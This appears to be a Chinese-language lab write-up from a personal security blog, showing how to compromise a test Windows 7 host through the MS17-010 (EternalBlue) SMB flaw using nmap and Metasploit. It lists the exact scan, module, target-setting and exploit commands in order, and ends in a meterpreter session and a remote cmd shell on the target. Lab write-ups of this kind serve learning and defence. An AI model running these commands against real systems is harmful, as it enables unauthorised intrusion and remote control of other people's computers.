MSF利用MS17_010渗透内网主机

记一次MSF利用MS17_010渗透内网主机

测试环境:

攻击主机:kali-linux-2020

目标主机:win7主机(测试时关闭了防火墙)

ip:192.168.94.130

信息搜集

1
nmap -sT -T4 -A 192.168.94.130

Snipaste_2020-12-23_16-40-44.png

可以看见开放了 445端口的smb共享文件操作

所以我们能利用永恒之蓝漏洞进行渗透

msf的使用

开启msf,初次使用需要 msfdb init 初始化一下msf的数据库(msf的数据库是postgresql)

后面就可以直接使用 msfdb start启动它的数据库了

启动msf

1
msfconsole

可以看到启动成功

Snipaste_2020-12-23_16-44-28.png

1
search ms17_010

看一看利用的模块

Snipaste_2020-12-23_16-45-43.png

可以先使用辅助模块 auxliar 进行辅助看看是否存在这个漏洞利用

1
auxiliary/scanner/smb/smb_ms17_010   

options看一下我们需要设置什么payload

Snipaste_2020-12-23_16-49-18.png

可以看到我们需要设置攻击的ip

1
set rhosts 192.168.94.130

然后 run 或者 exploit

Snipaste_2020-12-23_16-50-25.png

可以看到 可能存在ms17_010漏洞

接下来我们使用 exploit模块进行 漏洞利用getshell

1
use exploit/windows/smb/ms17_010_eternalblue 

然后 set payload 可以看到我们只需要设置 rhosts就行了

Snipaste_2020-12-23_16-57-27.png

1
set rhosts 192.168.94.130

然后run

可以看到成功了 进行的是meterpreter了

Snipaste_2020-12-23_17-01-44.png

输入shell 可以看到我们成功进入了目标机的cmd了

ipconfig可以看到一些信息

Snipaste_2020-12-23_17-05-03.png

tip:

cmd中文乱码可以使用 chcp 65001 修改编码 部分中文能成功显示

在meterpreter可以使用 background放入后台进程

sessions 命令可以看后台进程

Snipaste_2020-12-23_17-03-38.png

其它后渗透参考 https://blog.csdn.net/p_utao/article/details/108381939

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2021-2023 Wh1tecell
  • 访问人数: | 浏览次数:

请我喝杯咖啡吧~